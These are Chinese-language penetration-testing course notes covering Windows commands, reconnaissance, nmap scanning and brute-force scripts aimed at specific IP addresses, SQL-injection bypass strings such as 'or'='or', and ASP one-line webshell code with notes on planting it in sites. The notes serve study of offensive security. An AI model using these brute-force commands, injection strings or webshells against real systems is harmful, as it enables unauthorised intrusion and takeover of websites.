Safe: cracer
- TAGS: Safe
渗透测试流程
- 明确目标
- 信息收集
- 漏洞探测
- 漏洞验证
- 编写报告
- 信息整理
- 获取所需
- 信息分析
windows基础
黑客常用dos工具
color 改变cmd颜色
color a #绿色 color ? #帮助,数字字体颜色,字母为背景色
ping
#死亡ping ping -t -l 65550 ip
ipconfig
ipconfig #查看ip ipconfig /release #释放ip ipconfig /renew 重新获取ip
- systeminfo 查看系统信息
- arp -a
- new view 查看内网其它计算机
shutdown
shutdown -s -t 180 -c "你被黑了" #180秒关机并提示 shutdown -a #取消
- dir查看目录
- cd 切换目录
- start www.xx.com 打开网页
- start 123.txt 打开123.txt 或用 type 123.txt
conpy 创建文件
conpy con c:\123.txt #创建123.txt hello cracer #ctrl+z 回车 编辑完成
- md 目录名 创建目录
- rd 123 删除文件夹
- ren 原文件名 新文件名 重命名文件
- del 删除文件
- copy 复制文件
- move 移动文件
- tree 树形目录结构
- telnet
net
net use k: \\192.168.1.1\c$ #挂载远端c盘到本地k盘 net use k: \\192.168.1.1\c$ /del net start #查看开启了哪些服务 net start 服务名 #开启服务 如telnet schedule net stop 服务名 #关闭服务 net user 用户名 密码 /add #建立用户 net user guest /active:yes #激活guset用户 net user 查看有哪些用户 net user 账号名 查看账号的属性 net localgroup administrators 用户名 /add #把用户添加到管理员中使其有管理权限 net user guset 12345 # 用户guset用户登录后将密码改为12345 net password 密码 #更改系统登录密码 net share #查看本地开启的共享 net share ipc$ #开启ipc$共享 net share ipc$ /del #删除ipc$共享 net share c$ /del #删除c: 共享
netstat
netstat -a #查看开启了哪些端口,常用netstat -an netstat -n #查看端口的网络连接情况 netstat -v #查看正在进行的工作
at
at id号 #开启已注册的计划任务 at /delete #停止所有计划任务,用参数/yes则不需要确认就直接停止 at id号 /delete #停止某个已注册的计划任务 at #查看所有的计划任务
attrib
attrib 文件名(目录名) #查看某文件的属性 attrib 文件名 -A -R -S -H 或 +A +R +S +H #去掉(添加)某文件的存档,只读,系统,隐藏属性;用+则是添加为某属性
批处理文件
新建批处理文件
copy con 123.bat net user cracer 123123 /add net localgroup administrator cracer /add #ctrl+z 编辑完成
windows操作系统快捷键
F1 显示当前程序或者windows的帮助内容 F2 当你选中一个文件的话,这意味着“重命名” F3 当你在桌面上打开“查找:所有文件”对话框 alt-F4 关闭当前应用程序中当前文本 F5 刷新 ctrl-F5 强行刷新 ctrl-F6 切换到当前应用程序中的下一个文本 F10或alt 激活当前程序的菜单 win键或ctrl-esc 打开开始菜单 ctrl-alt-delete 在win9x中打开关闭程序对话框 delete 删除被选中的项目,文件会被放到回收站 shift-delete 直接删除 ctrl-N #新建文件夹 ctrl-O #打开“打开文件”对话框 ctrl-P #打开“打印”对话框 ctrl-S #保存当前操作的文件 ctrl-X #剪切被选中项目到剪切板 ctrl-insert 或 ctrl-C #复制被选中的项目到剪切板 shift-insert 或者 ctrl-V #粘贴剪贴板中的内容 alt-backspace 或者 ctrl-Z #撤消上一步操作 alt-shift-backspce #重做上一步操作 win键-tab #在任务栏上按键间循环 win键-F1 #显示“帮助” win键-M #最小化所有被打开窗口 shift-win键-m #撤消最小化所有窗口 win键-ctrl-M #重新将恢复上一项操作前窗口的大小和位置 win键-E #打开资源管理器 win键-F #打开“查找:所有文件”对话框 win键-R #打开“运行”对话框 win键-d #显示桌面 win键-l #锁屏 win键-break # 打开“系统属性”对话框 win键-ctrl-F #打开“查找:计算机”对话框 shift-F10或鼠标右击 #打开当前活动项目的快捷菜单 alt-F4 #关闭当前应用程序 alt-spacebar #打开程序最左上角菜单 alt-tab #切换当前程序 alt-esc #切换当前程序 alt-enter #将windows下运行的MSDOS窗口在窗口和全屏状态间切换 PRINT SCREEN #将当前屏幕以图象方式拷贝到剪切板 对话框中的快捷键 取消当前任务 ecs 在选项上向后移动 shift-tab 在选项卡上向后移动 ctrl-shift-tab 在选项上向前移动 tab 在选项卡上向前移动 ctrl-tab 复制 ctrl-c 剪切 ctrl-x 粘贴 ctrl-v 删除 delete
系统优化
修改启动项目
开始菜单在搜索框中输入“msconfig”打开系统配置窗口找到“启动”选项
加快系统启动速度
- 开始菜单在搜索框中输入“msconfig”打开系统配置窗口找到“引导”选项
- 点击“高级选项“此时就可以看到我们将要修改的设置项了
提高窗口切换速度
右击计算机属性–性能信息和工具–调整视觉效果
使用工具优化
linux基础
网络基础
OSI分层
信息收集
基本信息收集
- 信息收集
- 域名信息
- 敏感目录
- 端口扫描
- 旁站c段
- 整站分析
- 谷歌hacker
- URL采集
- 信息分析
- 工具网站
工具系统: kali
域名信息 test
- 域名–ip
- 查询工具
- windows: nslookup
- linux: dnsenum, dnswalk, dig
- 查询工具
- 子域名收集
- google语法: site:xx.com
- 工具: layer子域名挖掘机、subDomainsBrute
- whois查询
根据已知域名反查,分析出域名注册人、邮箱等信息
- 站长工具 http://tool.chinaz.com
- netcraft http://searchdns.netcraft.com
敏感目录收
- 收集方向
- robots.txt,
- 后台目录
- 上传目录 工具:fckeditor, ewebedit, ckfinder
- mysql管理接口 可能的接口:phpmyadmin, pma, phadmin
- 安装包,安装页面,phpinfo、编辑器,iis短文件
- 常用工具
安全工具包
- 字典爆破 御剑、dirbuster、wwwscan、IIS_shortname_Scanner等
- 蜘蛛爬行 爬行菜刀、awvs、webrobot、burp等
端口扫描
- 常用工具 nmap, portscan, ntscan, telnet
旁站c段
旁站:同服务器其它站点 c段:同一网段其他服务器
- 常用工具
- web k8旁站 御剑1.5
- 端口 postscan
整站分析
- 服务器类型 服务器平台、版本等
- 网站容器 搭建网站的服务组件:iis,nginx, tomact等
- 脚本类型 asp, php, jsp, aspx等
- 数据库类型 access, sqlserver, mysql, oracle, postgresql等
- CMS内容管理系统类型 在web渗透过程中,Web指纹识别是信息收集环节中一个比较重要的步骤,通过一些开源的工具、平台或者手工检测CMS系统是公开的CMS程序还是二次开发至关重要,能准确的获取CMS类型、Web服务组件类型及版本信息可以帮助安全工程师快速有效的去验证已知漏洞。对目标渗透测试过程中,目标的cms是十分重要的信息,有了目标的cms,就可以利用相关bug进行测试,进行代码审计等。
- WAF 一般waf会拦截`and`参数 。 如`xx.com/xx.php?id=224 and 1=1` 来判断有没有做and拦截
google hacker
- intext 查找网页中关键字
- intitle 查找标题
- filetype 查找文件类型的文件
- inurl 查找url中带有某字段的网站 `inurl:asp?id= sit:.jp`
- site 指定域名中查找
网站后台查找
- 弱口令默认后台:admin, admin/login.asp, manage, login.asp等
- 查看网页的链接:一般来说,主页有管理登录类似的东西
- 查看网站图片属性
- 查看网站使用的管理系统,从而确定后台
- 用工具查找:wwwscan, intellitamper, 御剑
- robots.txt的帮助:告诉蜘蛛程序在服务器上有什么样的文件可以被查看
- google hacker
- 查看网站使用的编辑器是否是默认后台
- 短文件利用
- `sqlmap –slq-shell load_file('d:/wwroot/index.php');`
CDN绕过方法
修改host
- 服务器主动发包(邮件)
- 敏感文件泄漏
漏洞分析
常用漏洞分析工具
awvs/nmap/sqlmap/metsta自动跑 burp 手动挖掘
- nmap
- awvs
- appscan
- burpsuite
- netsparker
- jsky
- safe3wvs
- 椰树
- m7lrv
nmap 端口扫描之王
主机探测
#扫描单个主机 nmap ip #扫描整个子网 nmap ip/14 #扫描多个目标 nmap ip ip #扫描指定范围 nmap 192.168.1-100 #扫描ip列表文件 nmap -iL target.txt #看到扫描的所有主机列表 nmap -sL ip/24 #扫描除某ip nmap ip/24 -exclude ip #扫描除文件中的ip nmap ip/24 -exclude a.txt
端口扫描
#常用命令 nmap -F -sT -v nmap.org -F 扫描100个最有可能的端口 -sT 采用tcp扫描,默认tcp -p 指定端口。如-p80,22,23 -p22-50 #使用udp ping探测主机 nmap -PU ip/24
tcp扫描(`-sT`) 运行原理:tcp三次握手 syn扫描(`-sS`) 没有建立正常的tcp三次握手,不被防火墙和日志记录
服务版本扫描
#服务版本探测 nmap -V #精准确认端口上运行的服务 nmap -sV --script unusual-port ip
主机系统指纹识别
nmap -O ip nmap -A ip -oN a.txt -oN 导出扫描结果 -oX 导出扫描结果xml格式
密码破解
不是强项,可利用其它工具如hydra等 使用nmap 验证多种漏洞
#暴力破解vnc nmap --script vnc-brute --script-arg \ brute.guesses=6,brute.emptypass=true,userdb=/root/dictionary/user.txt,brute.useraspass=true,passdb=/root/dictionary/pass.txt,brute.retries=3,brute.threads=2,brute.delay=3 42.96.170.128 #破解telnet nmap -p 23 --script telnet-brute --script-args userdb=myusers.lst,passdb=mypwds.lst --script-args telnet-brute.timeout=8s 203.195.139.153 #ftp弱口令暴力破解 nmap --script ftp-brute --script-args brute.emptypass=true,ftp-brute.timeout=30,userdb=/root/dirtionary/usernames.txt,brute.useraspass=true,passdb=/root/dirtionary/passwords.txt,brute.threads=3,brute.delay=6 203.195.139.153
漏洞探测
不是强项,awvs/appscan等
#验证HTTP.sys 远程代码执行 nmap -sV --script http-vuln-cve2015-1635 203.195.139.153 #IIS 短文件泄露 nmap -p 8080 --script http-iis-short-name-brute 61.142.64.176 #拒绝服务 nmap --max-parallelism 800--script http-slowloris http://scanme.nmap.org #验证http 中开启了put 方法 nmap --script http-put --script-args http-put.url=/uploads/testput.txt,http-put.file=/root/put.txt 218.19.141.16 #验证mysql 匿名访问 nmap --script mysql-empty-password 203.195.139.153
防火墙绕过
-f 分片绕过 -D 使用诱饵隐蔽扫描 nmap -D 1.1.1.1,222.222.222.222 xx.com --source-port 源端口欺骗
创建扫描脚本
awvs 漏洞扫描
acunetix web vulnerability scanner是知名的漏洞扫描工具 常见功能
- 网站爬行
- 漏洞扫描
- 目标发现
- 子域名扫描
- http编辑
- http嗅探
- http模糊测试
- 认证测试
- 网络服务扫描器
黑客的迂回打法
弱漏洞利用方法
暴库利用方法
access 文件形式 data.mdb sqlserver,mysql 下载数据连接文件
目录遍历漏洞
inurl:/inc/conn.asp intext:to parent directory intext:mdb 所有可以目录浏览的网页都有一些相同的地址,主要是下面几个 last modified Description 转到父目录
弱口令猜解
逻辑万能密钥
'or'='or' admin' or '1'='1 admin' #
破解工具
burpsuite discuz破解器 一些python密码破解脚本 httpfuzzer 针对性破解工具
access注入
网站分类
- 静态网站 html htm
- 动态网站 asp/aspx/php/jsp等 依赖数据库;灵活性好,维护方便;交互性好,功能强大 ;存在安全风险,可能存在sql注入
常见注入流程
客户端:参数值等数据被修改–> 服务端:未经检查和过滤,将被修改的数据注入到sql中 –> 数据库:执行sql –> 服务端:将注入的结果返回客户端 –> 客户端:获取到敏感数据
asp连接access数据库代码
工具: access数据库密码破解专家
打开工具
辅臣数据库浏览器 破障浏览器
判断
- 数据库类型 sql语句有没有对应表
- 判断字段长度 order by 20
- union联合查询[[[[[[[]]]]]]] `union select 1,2,3,4 from admin`
常用注入工具
穿山甲、sqlmap等
偏移注入
垮裤查询
Mssql注入
学校、政府、oa、游戏、棋牌、人事考试 sqlserver
- 1433端口 抓鸡 hydra破解
mysql注入
脚本木马
一句话木马
<%execute request("value")%>
木马工作原理
- 黑客在注册信息的电子邮箱或者个人主页等中插入类似如下代码
- `<%execute request("value")%>`
- 其中value是值,所以你可以更改自己值,前面的request就是获取这个值
- `<%eval request("value")%>`现在比较多见,而且字符少,对表单字数有限制的地方特别实用
- 当前知道了数据库的url,就可以利用本地一张网页进行连接得到webshell(不知道数据库也可以 只要这个一句话文件被插入到哪个asp文件就可以了)
- 这就被称为一句话木马,它是基于b/s结构的
常见写法
- asp
- php
- aspx
- jsp
一句话图片
一句话客户端
- 一句话客户端增强版
- 中国菜刀
- 中国砍刀
- lanker一句话客户端
- zv新型php一句话木马客户端gui版